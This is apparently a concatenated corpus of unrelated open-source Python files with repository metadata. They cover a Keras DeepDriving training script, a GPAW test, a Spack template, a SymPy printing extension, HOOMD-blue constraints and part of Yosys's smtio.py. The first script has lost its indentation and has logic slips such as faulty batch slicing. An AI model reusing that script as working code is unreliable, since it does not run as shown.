def train(db, keys, avg, batch_size, epochs, nb_tr, nb_val , samples=None, val_samples=None, labels=True, scale_affords= False):
if samples is None:
samples = int(nb_tr/batch_size)
if val_samples is None:
val_samples = int(nb_val/batch_size)
if pretrained and isfile(weights_filename):
model = alexnet(weights_path=weights_filename)
else:
model = alexnet()
model.fit_generator( our_datagen(db, keys[0:nb_tr], avg, batch_size, labels=True,scale_affords=scale_out),
samples_per_epoch = samples, nb_epoch = epochs,
verbose=2, callbacks=[csvlog, reduce_lr, mdlchkpt,tbCallBack],
validation_data=our_datagen(db, keys[nb_tr:nb_tr+nb_val], avg, batch_size, labels=True,scale_affords=scale_out),
nb_val_samples=val_samples)
model.save(model_filename)
model.save_weights(weights_filename)
return model
def alexnet(weights_path=None):
"""
Returns a keras model for a CNN.
input data are of the shape (227,227), and the colors in the RGB order (default)
model: The keras model for this convnet
output_dict: Dict of feature layers, asked for in output_layers.
"""
inputs = Input(shape=dim)
conv_1 = Convolution2D(96, 11, 11, subsample=(4, 4), activation='relu', name='conv_1')(inputs)
# initial weights filler? gaussian, std 0.01
conv_2 = MaxPooling2D((3, 3), strides=(2, 2))(conv_1)
conv_2 = BatchNormalization()(conv_2)
# in caffe: Local Response Normalization (LRN)
# alpha = 1e-4, k=2, beta=0.75, n=5,
#conv_2 = ZeroPadding2D((2, 2))(conv_2)
conv_2 = Convolution2D(256, 5, 5, activation="relu", name='conv_2')(conv_2)
conv_3 = MaxPooling2D((3, 3), strides=(2, 2))(conv_2)
conv_3 = BatchNormalization()(conv_3)
#conv_3 = ZeroPadding2D((1, 1))(conv_3)
conv_3 = Convolution2D(384, 3, 3, activation='relu', name='conv_3')(conv_3)
#conv_3 = ZeroPadding2D((1, 1))(conv_3)
conv_4 = Convolution2D(384, 3, 3, activation="relu", name='conv_4')(conv_3)
#conv_4 = ZeroPadding2D((1, 1))(conv_4)
conv_5 = Convolution2D(256, 3, 3, activation="relu", name='conv_5')(conv_4)
if same_size is True:
dense_1 = MaxPooling2D((3, 3), strides=(2, 2), name="convpool_5")(conv_5)
dense_1 = Flatten(name="flatten")(dense_1)
else:
dense_1 = Flatten(name="flatten")(conv_5)#(dense_1)
# initial weights filler? gaussian, std 0.005
dense_1 = Dense(4096, activation='relu', name='dense_1')(dense_1)
dense_2 = Dropout(0.5)(dense_1)
dense_2 = Dense(4096, activation='relu', name='dense_2')(dense_2)
dense_3 = Dropout(0.5)(dense_2)
# initial weights filler? gaussian, std 0.01
dense_3 = Dense(256, activation='relu', name='dense_3')(dense_3)
dense_4 = Dropout(0.5)(dense_3)
# output: 14 affordances, gaussian std 0.01
dense_4 = Dense(13, activation='linear', name='dense_4')(dense_4)
# dense_4 = Dense(14, activation='linear', name='dense_4')(dense_4)
model = Model(input=inputs, output=dense_4)
model.summary()
raw_input("Press Enter to continue...")
if weights_path:
model.load_weights(weights_path)
# sgd = SGD(lr=0.01, decay=0.0005, momentum=0.9) # nesterov=True) # LSTM
adam = Adam(lr=5e-4)
model.compile(optimizer=adam, loss='mse',metrics=['mae']) # try cross-entropy
return model
def our_datagen(db, keys, avg,batch_size,labels=True,scale_affords=False):
n = len(keys)/batch_size
n = int(n)
affordance_dim = 13
for index in range(0,n):
xdim = (batch_size,) + dim
X_train = np.zeros(xdim)
Y_train = np.zeros((batch_size, affordance_dim))
for i, key in enumerate(keys[index:(index+batch_size)]):
img = cv2.imread(key)
# img.shape = 210x280x3
if not same_size:
img = cv2.resize(img, (64, 64))
img = img / 255.0
img = np.subtract(img, avg)
if K.image_dim_ordering() == 'th':
img = np.swapaxes(img, 1, 2)
img = np.swapaxes(img, 0, 1)
X_train[i] = img
if labels is True:
j = int(key[-12:-4])
affordances = db[j - 1]
if int(affordances[0]) != j:
raise ValueError('Image and affordance do not match: ' + str(j))
affordances = affordances[1:(affordance_dim+1)]
if scale_affords is True:
affordances = scale_output(affordances)
affordances = affordances.reshape(1, affordance_dim)
Y_train[i] = affordances
if labels is True:
yield X_train, Y_train
else:
yield X_train
def predict_affordances(db, keys, avg, model, batch_size, verbose = 0, scale_affords=False):
nb_ts = len(keys)
nb = int(nb_ts/batch_size)
affordance_dim = 13
Y_true = np.zeros((nb*batch_size, affordance_dim))
Y_pred = np.zeros((nb*batch_size, affordance_dim))
err = np.zeros((nb*batch_size, affordance_dim))
err_avg = np.zeros((1, affordance_dim))
for index in range(0,nb):
#xdim = (batch_size,) + dim
#X_train = np.zeros(xdim)
#Y_train = np.zeros((batch_size, affordance_dim))
for i, key in enumerate(keys[index:(index+batch_size)]):
img = cv2.imread(key)
# img.shape = 210x280x3
if not same_size:
img = cv2.resize(img, (64, 64))
img = img / 255.0
img = np.subtract(img, avg)
if K.image_dim_ordering() == 'th':
img = np.swapaxes(img, 1, 2)
img = np.swapaxes(img, 0, 1)
img = np.expand_dims(img, axis=0)
j = int(key[-12:-4])
affordances = db[j - 1]
if int(affordances[0]) != j:
raise ValueError('Image and affordance do not match: ' + str(j))
affordances = affordances[1:(affordance_dim+1)]
if scale_affords is True:
affordances = scale_output(affordances)
affordances = affordances.reshape(1, affordance_dim)
affords_pred = model.predict(img)
Y_true[i + (index*batch_size)] = affordances
Y_pred[i + (index*batch_size)] = affords_pred
err[i + (index*batch_size)] = np.abs(affords_pred - affordances)
#predict.append(Y_train)
if verbose is 1:
test = (index+1)*batch_size
print('Number of samples predicted so far:' + str(test))
err_avg = err.mean(axis=0)
return Y_pred, Y_true, err, err_avg
def scale_output(affordances):
''' Scale output between [0.1, 0.9]
'''
affordances[0] = affordances[0] / 1.1 + 0.5 # angle
affordances[1] = affordances[1] / 5.6249 + 1.34445 # toMarking_L
affordances[2] = affordances[2] / 6.8752 + 0.39091 # toMarking_M
affordances[3] = affordances[3] / 5.6249 - 0.34445 # toMarking_R
affordances[4] = affordances[4] / 95 + 0.12 # dist_L
affordances[5] = affordances[5] / 95 + 0.12 # dist_R
affordances[6] = affordances[6] / 6.8752 + 1.48181 # toMarking_LL
affordances[7] = affordances[7] / 6.25 + 0.98 # toMarking_ML
affordances[8] = affordances[8] / 6.25 + 0.02 # toMarking_MR
affordances[9] = affordances[9] / 6.8752 - 0.48181 # toMarking_RR
affordances[10] = affordances[10] / 95 + 0.12 # dist_LL
affordances[11] = affordances[11] / 95 + 0.12 # dist_MM
affordances[12] = affordances[12] / 95 + 0.12 # dist_RR
return affordances
def descale_output(affordances):
affordances_unnorm = np.zeros(affordances.shape)
affordances_unnorm[:,0] = (affordances[:,0] - 0.5) * 1.1
affordances_unnorm[:,1] = (affordances[:,1] - 1.34445) * 5.6249
affordances_unnorm[:,2] = (affordances[:,2] - 0.39091) * 6.8752
affordances_unnorm[:,3] = (affordances[:,3] + 0.34445) * 5.6249
affordances_unnorm[:,4] = (affordances[:,4] - 0.12) * 95
affordances_unnorm[:,5] = (affordances[:,5] - 0.12) * 95
affordances_unnorm[:,6] = (affordances[:,6] - 1.48181) * 6.8752
affordances_unnorm[:,7] = (affordances[:,7] - 0.98) * 6.25
affordances_unnorm[:,8] = (affordances[:,8] - 0.02) * 6.25
affordances_unnorm[:,9] = (affordances[:,9] + 0.48181) * 6.8752
affordances_unnorm[:,10] = (affordances[:,10] - 0.12) * 95
affordances_unnorm[:,11] = (affordances[:,11] - 0.12) * 95
affordances_unnorm[:,12] = (affordances[:,12] - 0.12) * 95
return affordances_unnorm
def load_average():
h5f = h5py.File('/home/exx/Avinash/DReD/local/deepdriving_average.h5', 'r')
avg = h5f['average'][:]
h5f.close()
return avg
if __name__ == "__main__":
dbpath = '/data/deepdriving/train_images/'
keys = glob(dbpath + '*.jpg')
#keys.sort()
db = np.load(dbpath + 'affordances.npy')
# TODO : shuffle and keep aligned
db = db.astype('float32')
avg = load_average()
scale_out = False
same_size = True
pretrained = False
model_num = 9
folder = "/home/exx/Avinash/DReD/local/"
model_filename = folder + 'models/cnnmodel%d.json' % model_num
weights_filename = folder + 'models/cnnmodel%d_weights.h5' % model_num
logs_path = folder + "models/run%d/" % model_num
csvlog_filename = folder + 'models/cnnmodel%d.csv' % model_num
# tensorboard --logdir /home/exx/Avinash/DReD/local/models/
tbCallBack = TensorBoard(log_dir=logs_path, histogram_freq=0, write_graph=True, write_images=False)
csvlog = CSVLogger(csvlog_filename, separator=',', append=False)
mdlchkpt = ModelCheckpoint(weights_filename, monitor='val_loss', save_best_only=True, save_weights_only=True, period=2, verbose=1)
erlystp = EarlyStopping(monitor='val_loss', min_delta=1e-4, patience=10, verbose=1)
reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.8, patience=5, min_lr=1e-5, verbose=1)
if K.image_dim_ordering() == 'tf':
print('Tensorflow')
if same_size:
dim = (210, 280, 3)
else:
dim = (64, 64, 3)
else:
print('Theano')
if same_size:
dim = (3, 210, 280)
else:
dim = (3, 64, 64)
# avg.shape = 210x280x3
if not same_size:
avg = cv2.resize(avg, (64, 64))
batch_size = 32
epochs = 25
nb_tr = 350000
nb_val = 50000
nb_ts = 5056 #84800
if os.path.exists(model_filename):
json_file = open(model_filename, 'r')
model_json = json_file.read()
json_file.close()
print('Model found and loading ...')
model = model_from_json(model_json)
print("Loading the best weights for evaluation")
model.load_weights(weights_filename)
adam = Adam(lr=5e-4)
model.compile(optimizer=adam, loss='mse',metrics=['mae']) # try cross-entropy
else:
print('New model is built and training...')
model = train(db, keys, avg, batch_size, epochs, nb_tr, nb_val , samples=None, val_samples=None, labels=True,scale_affords=scale_out)
print("Loading the best weights for evaluation")
model.load_weights(weights_filename)
# saving the model to disk
model_json = model.to_json()
with open(model_filename, "w") as json_file:
json_file.write(model_json)
print("Saved model to disk")
ts_samples = int(nb_ts/batch_size)
score = model.evaluate_generator(our_datagen(db, keys[nb_tr+nb_val:nb_tr+nb_val+nb_ts], avg, batch_size), ts_samples)
print('TestData MSE:', score[0])
print('TestData MAE', score[1])
Y_pred, Y_true, err, err_avg = predict_affordances(db, keys[nb_tr+nb_val:nb_tr+nb_val+nb_ts], avg, model, batch_size, verbose=1, scale_affords = scale_out)
if scale_out is True:
Y_pred_unnorm = descale_output(Y_pred)
Y_true_unnorm = descale_output(Y_true)
err = descale_output(err)
err_avg = descale_output(err_avg.reshape(1,13))
print("Time taken is %s seconds " % (time() - start_time))
|
babraham123/deepdriving
|
new/avimodel/train_idg.py
|
Python
|
mit
| 13,067
|
[
"Gaussian"
] |
bbdaddbb744281a8478146524e1c48a175c306a061b6c8e7e7295d0a8251313e
|
import numpy as np
from ase import Atoms
from gpaw import GPAW
from gpaw.xc.sic import SIC
from gpaw.test import equal
a = 7.0
atom = Atoms('N', magmoms=[3], cell=(a, a, a))
molecule = Atoms('N2', positions=[(0, 0, 0), (0, 0, 1.14)], cell=(a, a, a))
atom.center()
molecule.center()
calc = GPAW(xc=SIC(),
h=0.17,
txt='n2.sic.new3b.txt',
setups='hgh')
atom.set_calculator(calc)
e1 = atom.get_potential_energy()
molecule.set_calculator(calc)
e2 = molecule.get_potential_energy()
F_ac = molecule.get_forces()
print 2 * e1 - e2
print F_ac
|
ajylee/gpaw-rtxs
|
gpaw/test/scfsic_n2.py
|
Python
|
gpl-3.0
| 573
|
[
"ASE",
"GPAW"
] |
efc45f53f57479137e7086ebf536b57c5ba5b78656fc02b13d86fbce57f12c8a
|
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Bowtie(MakefilePackage):
"""FIXME: Put a proper description of your package here."""
# FIXME: Add a proper url for your package's homepage here.
homepage = "http://www.example.com"
url = "https://downloads.sourceforge.net/project/bowtie-bio/bowtie/1.2.1.1/bowtie-1.2.1.1-src.zip"
version('1.2.1.1', 'ec06265730c5f587cd58bcfef6697ddf')
# FIXME: Add dependencies if required.
# depends_on('foo')
def edit(self, spec, prefix):
# FIXME: Edit the Makefile if necessary
# FIXME: If not needed delete this function
# makefile = FileFilter('Makefile')
# makefile.filter('CC = .*', 'CC = cc')
return
|
skosukhin/spack
|
lib/spack/docs/tutorial/examples/Makefile/0.package.py
|
Python
|
lgpl-2.1
| 1,934
|
[
"Bowtie"
] |
1bd1246153e8e93410fa7d4d08dd3a4e8b95ee60779e464c57892b962c4143ef
|
"""
A print function that pretty prints SymPy objects.
:moduleauthor: Brian Granger
Usage
=====
To use this extension, execute:
%load_ext sympy.interactive.ipythonprinting
Once the extension is loaded, SymPy Basic objects are automatically
pretty-printed in the terminal and rendered in LaTeX in the Qt console and
notebook.
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2008 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
from sympy.interactive.printing import init_printing
#-----------------------------------------------------------------------------
# Definitions of special display functions for use with IPython
#-----------------------------------------------------------------------------
def load_ipython_extension(ip):
"""Load the extension in IPython."""
init_printing(ip=ip)
|
amitjamadagni/sympy
|
sympy/interactive/ipythonprinting.py
|
Python
|
bsd-3-clause
| 1,230
|
[
"Brian"
] |
3c41789d413561c1167681bdaab9b798cf069ffdfd0f0ce18f0e204d225dcc79
|
# Copyright (c) 2009-2021 The Regents of the University of Michigan This file is
# part of the HOOMD-blue project, released under the BSD 3-Clause License.
# Maintainer: joaander / All Developers are free to add commands for new
# features
r"""Constraints.
Constraint forces can constrain particles to be a set distance from each other,
to have some relative orientation, or impose other types of constraint.
The `Rigid` class is special in that only one is allowed in a system and is set
to an `hoomd.md.Integrator` object separately in the
`rigid <hoomd.md.Integrator.rigid>` attribute.
Warning:
Constraints will be invalidated if two separate constraints apply to the
same particle.
The degrees of freedom removed from the system by constraints are
accounted for in `hoomd.md.ThermodynamicQuantities`.
"""
from hoomd.md import _md
from hoomd.data.parameterdicts import ParameterDict, TypeParameterDict
from hoomd.data.typeparam import TypeParameter
from hoomd.data.typeconverter import OnlyIf, to_type_converter
import hoomd
from hoomd.operation import _HOOMDBaseObject
class Constraint(_HOOMDBaseObject):
"""A constraint force that acts on the system."""
def _attach(self):
"""Create the c++ mirror class."""
if isinstance(self._simulation.device, hoomd.device.CPU):
cpp_cls = getattr(_md, self._cpp_class_name)
else:
cpp_cls = getattr(_md, self._cpp_class_name + "GPU")
self._cpp_obj = cpp_cls(self._simulation.state._cpp_sys_def)
super()._attach()
class Distance(Constraint):
"""Constrain pairwise particle distances.
Args:
tolerance (float): Relative tolerance for constraint violation warnings.
`Distance` applies forces between particles to constrain the distances
between particles to specific values. The algorithm implemented is described
in:
1. M. Yoneya, H. J. C. Berendsen, and K. Hirasawa, "A Non-Iterative
Matrix Method for Constraint Molecular Dynamics Simulations," Molecular
Simulation, vol. 13, no. 6, pp. 395--405, 1994.
2. M. Yoneya, "A Generalized Non-iterative Matrix Method for Constraint
Molecular Dynamics Simulations," Journal of Computational Physics,
vol. 172, no. 1, pp. 188--197, Sep. 2001.
Each distance constraint takes the form:
.. math::
\\chi_{ij}(r) = (\\vec{r}_j - \\vec{r}_i) \\cdot
(\\vec{r}_j - \\vec{r}_i)
- d_{ij}^2 = 0
In brief, the second derivative of the Lagrange multipliers with respect to
time is set to zero, such that both the distance constraints and their time
derivatives are conserved within the accuracy of the Velocity Verlet scheme,
i.e. within :math:`\\Delta t^2`. The corresponding linear system of
equations is solved. Because constraints are satisfied at :math:`t + 2
\\Delta t`, the scheme is self-correcting and drifts are avoided.
.. hint::
Define the particles (:math:`i,j`) and distances (:math:`d_{ij}`) for
each pairwise distance constraint in a GSD file with
`gsd.hoomd.Snapshot.constraints` or in a `hoomd.Snapshot` with
`hoomd.Snapshot.constraints`.
Warning:
In MPI simulations, all particles connected through constraints will be
communicated between ranks as ghost particles. Therefore, it is an
error when molecules defined by constraints extend over more than half
the local domain size.
Note:
`tolerance` sets the tolerance to detect constraint violations and
issue a warning message. It does not influence the computation of the
constraint force.
Attributes:
tolerance (float): Relative tolerance for constraint violation warnings.
"""
_cpp_class_name = "ForceDistanceConstraint"
def __init__(self, tolerance=1e-3):
self._param_dict.update(ParameterDict(tolerance=float(tolerance)))
class Rigid(Constraint):
R"""Constrain particles in rigid bodies.
.. rubric:: Overview
Rigid bodies are defined by a single central particle and a number of
constituent particles. All of these are particles in the HOOMD system
configuration and can interact with other particles via md forces. The
mass and moment of inertia of the central particle set the full mass and
moment of inertia of the rigid body (constituent particle mass is ignored).
The central particle is at the center of mass of the rigid body and the
orientation quaternion defines the rotation from the body space into the
simulation box. Body space refers to a rigid body viewed in a particular
reference frame, namely, in body space, the center of mass of the body is at
:math:`(0,0,0)` and the moment of inertia is diagonal. You specify the
constituent particles to `Rigid` for each type of body in body coordinates.
Then, `Rigid` takes control of those particles, and sets their position and
orientation in the simulation box relative to the position and orientation
of the central particle. `Rigid` also transfers forces and torques from
constituent particles to the central particle. Then, MD integrators can use
these forces and torques to integrate the equations of motion of the central
particles (representing the whole rigid body) forward in time.
.. rubric:: Defining bodies
`Rigid` accepts one local body definition per body type. The
type of a body is the particle type of the central particle in that body.
In this way, each particle of type *R* in the system configuration defines
a body of type *R*.
As a convenience, you do not need to create placeholder entries for all of
the constituent particles in your initial configuration. You only need to
specify the positions and orientations of all the central particles. When
you call `create_bodies`, it will create all constituent particles.
Warning:
Automatic creation of constituent particles changes particle tags. When
there are bonds between particles in the initial configuration, or bonds
connect to constituent particles, include the constituent particles in
the initial configuration manually.
When you create the constituent particles manually (i.e. in an input file
or with snapshots), the central particle of a rigid body must have a lower
tag than all of its constituent particles. Constituent particles follow in
monotonically increasing tag order, corresponding to the order they were
defined in the argument to `Rigid` initialization. The order of central and
contiguous particles need **not** to be contiguous. Additionally, you must
set the ``body`` field for each of the particles in the rigid body to the
tag of the central particle (for both the central and constituent
particles). Set ``body`` to -1 for particles that do not belong to a rigid
body (i.e. free bodies).
.. rubric:: Integrating bodies
Most integrators in HOOMD support the integration of rotational degrees of
freedom. When there are rigid bodies present in the system, do not apply
integrators to the constituent particles, only the central and non-rigid
particles.
Example::
rigid_centers_and_free_filter = hoomd.filter.Rigid(
("center", "free"))
langevin = hoomd.md.methods.Langevin(
filter=rigid_centers_and_free_filter, kT=1.0)
.. rubric:: Thermodynamic quantities of bodies
HOOMD computes thermodynamic quantities (temperature, kinetic energy,
etc.) appropriately when there are rigid bodies present in the system.
When it does so, it ignores all constituent particles and computes the
translational and rotational energies of the central particles, which
represent the whole body.
.. rubric:: Restarting simulations with rigid bodies.
To restart, use `hoomd.write.GSD` to write restart files. GSD
stores all of the particle data fields needed to reconstruct the state of
the system, including the body tag, rotational momentum, and orientation of
the body. Restarting from a gsd file is equivalent to manual constituent
particle creation. You still need to specify the same local body space
environment to `Rigid` as you did in the earlier simulation.
To set constituent particle types and coordinates for a rigid body use the
`body` attribute.
.. py:attribute:: body
body is a mapping from the central particle type to a body definition
represented as a dictionary. The mapping respects ``None`` as meaning
that the type is not a rigid body center. All types are set to ``None``
by default. The keys for the body definition are
- ``constituent_types`` (list[str]): List of types of constituent
particles
- ``positions`` (list[tuple[float, float, float]]): List of relative
positions of constituent particles
- ``orientations`` (list[tuple[float, float, float, float]]): List of
orientations (as quaternions) of constituent particles
- ``charge`` (list[float]): List of charges of constituent particles
- ``diameters`` (list[float]): List of diameters of constituent
particles
Type: `TypeParameter` [``particle_type``, `dict`]
.. caution::
The constituent particle type must exist.
Example::
rigid = constrain.Rigid()
rigid.body['A'] = {
"constituent_types": ['A_const', 'A_const'],
"positions": [(0,0,1),(0,0,-1)],
"orientations": [(1.0, 0.0, 0.0, 0.0), (1.0, 0.0, 0.0, 0.0)],
"charges": [0.0, 0.0],
"diameters": [1.0, 1.0]
}
rigid.body['B'] = {
"constituent_types": ['B_const', 'B_const'],
"positions": [(0,0,.5),(0,0,-.5)],
"orientations": [(1.0, 0.0, 0.0, 0.0), (1.0, 0.0, 0.0, 0.0)],
"charges": [0.0, 1.0],
"diameters": [1.5, 1.0]
}
# Can set rigid body definition to be None explicitly.
rigid.body["A"] = None
Warning:
`Rigid` will significantly slow down a simulation when
frequently changing rigid body definitions or adding/removing particles
from the simulation.
"""
_cpp_class_name = "ForceComposite"
def __init__(self):
body = TypeParameter(
"body", "particle_types",
TypeParameterDict(OnlyIf(to_type_converter({
'constituent_types': [str],
'positions': [(float,) * 3],
'orientations': [(float,) * 4],
'charges': [float],
'diameters': [float]
}),
allow_none=True),
len_keys=1))
self._add_typeparam(body)
self.body.default = None
def create_bodies(self, state):
R"""Create rigid bodies from central particles in state.
Args:
state (hoomd.State): The state in which to create rigid bodies.
This method will remove any existing constituent particles (defined as
having a valid body flag without a central particle definition in the
rigid `body` attribute).
Note:
This method will change any exiting body tags.
Tip:
If planning on using this function, initialize the `hoomd.State`
with free and central particles without worrying about the body
tag. Existing body values or constituent particles in the state
won't cause errors, but the method does not need it.
Warning:
This method must be called before its associated simulation is run.
"""
if self._attached:
raise RuntimeError(
"Cannot call create_bodies after running simulation.")
# Attach and store information for detaching after calling
# createRigidBodies
old_sim = None
if self._added:
old_sim = self._simulation
self._add(state._simulation)
super()._attach()
self._cpp_obj.createRigidBodies()
# Restore previous state
self._detach()
if old_sim is not None:
self._simulation = old_sim
else:
self._remove()
def _attach(self):
super()._attach()
# Need to ensure body tags and molecule sizes are correct and that the
# positions and orientations are accurate before integration.
self._cpp_obj.validateRigidBodies()
self._cpp_obj.updateCompositeParticles(0)
|
joaander/hoomd-blue
|
hoomd/md/constrain.py
|
Python
|
bsd-3-clause
| 12,667
|
[
"HOOMD-blue"
] |
c08c144a2d76c150769e88b9175a579ec020da528112374c035f90e452b73c7f
|
#
# yosys -- Yosys Open SYnthesis Suite
#
# Copyright (C) 2012 Clifford Wolf <clifford@clifford.at>
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
import sys, re, os, signal
import subprocess
if os.name == "posix":
import resource
from copy import deepcopy
from select import select
from time import time
from queue import Queue, Empty
from threading import Thread
# This is needed so that the recursive SMT2 S-expression parser
# does not run out of stack frames when parsing large expressions
if os.name == "posix":
smtio_reclimit = 64 * 1024
if sys.getrecursionlimit() < smtio_reclimit:
sys.setrecursionlimit(smtio_reclimit)
current_rlimit_stack = resource.getrlimit(resource.RLIMIT_STACK)
if current_rlimit_stack[0] != resource.RLIM_INFINITY:
smtio_stacksize = 128 * 1024 * 1024
if os.uname().sysname == "Darwin":
# MacOS has rather conservative stack limits
smtio_stacksize = 8 * 1024 * 1024
if current_rlimit_stack[1] != resource.RLIM_INFINITY:
smtio_stacksize = min(smtio_stacksize, current_rlimit_stack[1])
if current_rlimit_stack[0] < smtio_stacksize:
try:
resource.setrlimit(resource.RLIMIT_STACK, (smtio_stacksize, current_rlimit_stack[1]))
except ValueError:
# couldn't get more stack, just run with what we have
pass
# currently running solvers (so we can kill them)
running_solvers = dict()
forced_shutdown = False
solvers_index = 0
def force_shutdown(signum, frame):
global forced_shutdown
if not forced_shutdown:
forced_shutdown = True
if signum is not None:
print("<%s>" % signal.Signals(signum).name)
for p in running_solvers.values():
# os.killpg(os.getpgid(p.pid), signal.SIGTERM)
os.kill(p.pid, signal.SIGTERM)
sys.exit(1)
if os.name == "posix":
signal.signal(signal.SIGHUP, force_shutdown)
signal.signal(signal.SIGINT, force_shutdown)
signal.signal(signal.SIGTERM, force_shutdown)
def except_hook(exctype, value, traceback):
if not forced_shutdown:
sys.__excepthook__(exctype, value, traceback)
force_shutdown(None, None)
sys.excepthook = except_hook
hex_dict = {
"0": "0000", "1": "0001", "2": "0010", "3": "0011",
"4": "0100", "5": "0101", "6": "0110", "7": "0111",
"8": "1000", "9": "1001", "A": "1010", "B": "1011",
"C": "1100", "D": "1101", "E": "1110", "F": "1111",
"a": "1010", "b": "1011", "c": "1100", "d": "1101",
"e": "1110", "f": "1111"
}
class SmtModInfo:
def __init__(self):
self.inputs = set()
self.outputs = set()
self.registers = set()
self.memories = dict()
self.wires = set()
self.wsize = dict()
self.clocks = dict()
self.cells = dict()
self.asserts = dict()
self.covers = dict()
self.maximize = set()
self.minimize = set()
self.anyconsts = dict()
self.anyseqs = dict()
self.allconsts = dict()
self.allseqs = dict()
self.asize = dict()
class SmtIo:
def __init__(self, opts=None):
global solvers_index
self.logic = None
self.logic_qf = True
self.logic_ax = True
self.logic_uf = True
self.logic_bv = True
self.logic_dt = False
self.forall = False
self.timeout = 0
self.produce_models = True
self.smt2cache = [list()]
self.smt2_options = dict()
self.p = None
self.p_index = solvers_index
solvers_index += 1
if opts is not None:
self.logic = opts.logic
self.solver = opts.solver
self.solver_opts = opts.solver_opts
self.debug_print = opts.debug_print
self.debug_file = opts.debug_file
self.dummy_file = opts.dummy_file
self.timeinfo = opts.timeinfo
self.timeout = opts.timeout
self.unroll = opts.unroll
self.noincr = opts.noincr
self.info_stmts = opts.info_stmts
self.nocomments = opts.nocomments
else:
self.solver = "yices"
self.solver_opts = list()
self.debug_print = False
self.debug_file = None
self.dummy_file = None
self.timeinfo = os.name != "nt"
self.timeout = 0
self.unroll = False
self.noincr = False
self.info_stmts = list()
self.nocomments = False
self.start_time = time()
self.modinfo = dict()
self.curmod = None
self.topmod = None
self.setup_done = False
def __del__(self):
if self.p is not None and not forced_shutdown:
os.killpg(os.getpgid(self.p.pid), signal.SIGTERM)
if running_solvers is not None:
del running_solvers[self.p_index]
def setup(self):
assert not self.setup_done
if self.forall:
self.unroll = False
if self.solver == "yices":
if self.noincr or self.forall:
self.popen_vargs = ['yices-smt2'] + self.solver_opts
else:
self.popen_vargs = ['yices-smt2', '--incremental'] + self.solver_opts
if self.timeout != 0:
self.popen_vargs.append('-t')
self.popen_vargs.append('%d' % self.timeout);
if self.solver == "z3":
self.popen_vargs = ['z3', '-smt2', '-in'] + self.solver_opts
if self.timeout != 0:
self.popen_vargs.append('-T:%d' % self.timeout);
if self.solver == "cvc4":
if self.noincr:
self.popen_vargs = ['cvc4', '--lang', 'smt2.6' if self.logic_dt else 'smt2'] + self.solver_opts
else:
self.popen_vargs = ['cvc4', '--incremental', '--lang', 'smt2.6' if self.logic_dt else 'smt2'] + self.solver_opts
if self.timeout != 0:
self.popen_vargs.append('--tlimit=%d000' % self.timeout);
if self.solver == "mathsat":
self.popen_vargs = ['mathsat'] + self.solver_opts
if self.timeout != 0:
print('timeout option is not supported for mathsat.')
sys.exit(1)
if self.solver == "boolector":
if self.noincr:
self.popen_vargs = ['boolector', '--smt2'] + self.solver_opts
else:
self.popen_vargs = ['boolector', '--smt2', '-i'] + self.solver_opts
self.unroll = True
if self.timeout != 0:
print('timeout option is not supported for boolector.')
sys.exit(1)
if self.solver == "abc":
if len(self.solver_opts) > 0:
self.popen_vargs = ['yosys-abc', '-S', '; '.join(self.solver_opts)]
else:
self.popen_vargs = ['yosys-abc', '-S', '%blast; &sweep -C 5000; &syn4; &cec -s -m -C 2000']
self.logic_ax = False
self.unroll = True
self.noincr = True
if self.timeout != 0:
print('timeout option is not supported for abc.')
sys.exit(1)
if self.solver == "dummy":
assert self.dummy_file is not None
self.dummy_fd = open(self.dummy_file, "r")
else:
if self.dummy_file is not None:
self.dummy_fd = open(self.dummy_file, "w")
if not self.noincr:
self.p_open()
if self.unroll:
assert not self.forall
self.logic_uf = False
self.unroll_idcnt = 0
self.unroll_buffer = ""
self.unroll_sorts = set()
self.unroll_objs = set()
self.unroll_decls = dict()
self.unroll_cache = dict()
self.unroll_stack = list()
if self.logic is None:
self.logic = ""
if self.logic_qf: self.logic += "QF_"
if self.logic_ax: self.logic += "A"
if self.logic_uf: self.logic += "UF"
if self.logic_bv: self.logic += "BV"
if self.logic_dt: self.logic = "ALL"
if self.solver == "yices" and self.forall: self.logic = "BV"
self.setup_done = True
for stmt in self.info_stmts:
self.write(stmt)
if self.produce_models:
self.write("(set-option :produce-models true)")
#See the SMT-LIB Standard, Section 4.1.7
modestart_options = [":global-declarations", ":interactive-mode", ":produce-assertions", ":produce-assignments", ":produce-models", ":produce-proofs", ":produce-unsat-assumptions", ":produce-unsat-cores", ":random-seed"]
for key, val in self.smt2_options.items():
if key in modestart_options:
self.write("(set-option {} {})".format(key, val))
self.write("(set-logic %s)" % self.logic)
if self.forall and self.solver == "yices":
self.write("(set-option :yices-ef-max-iters 1000000000)")
for key, val in self.smt2_options.items():
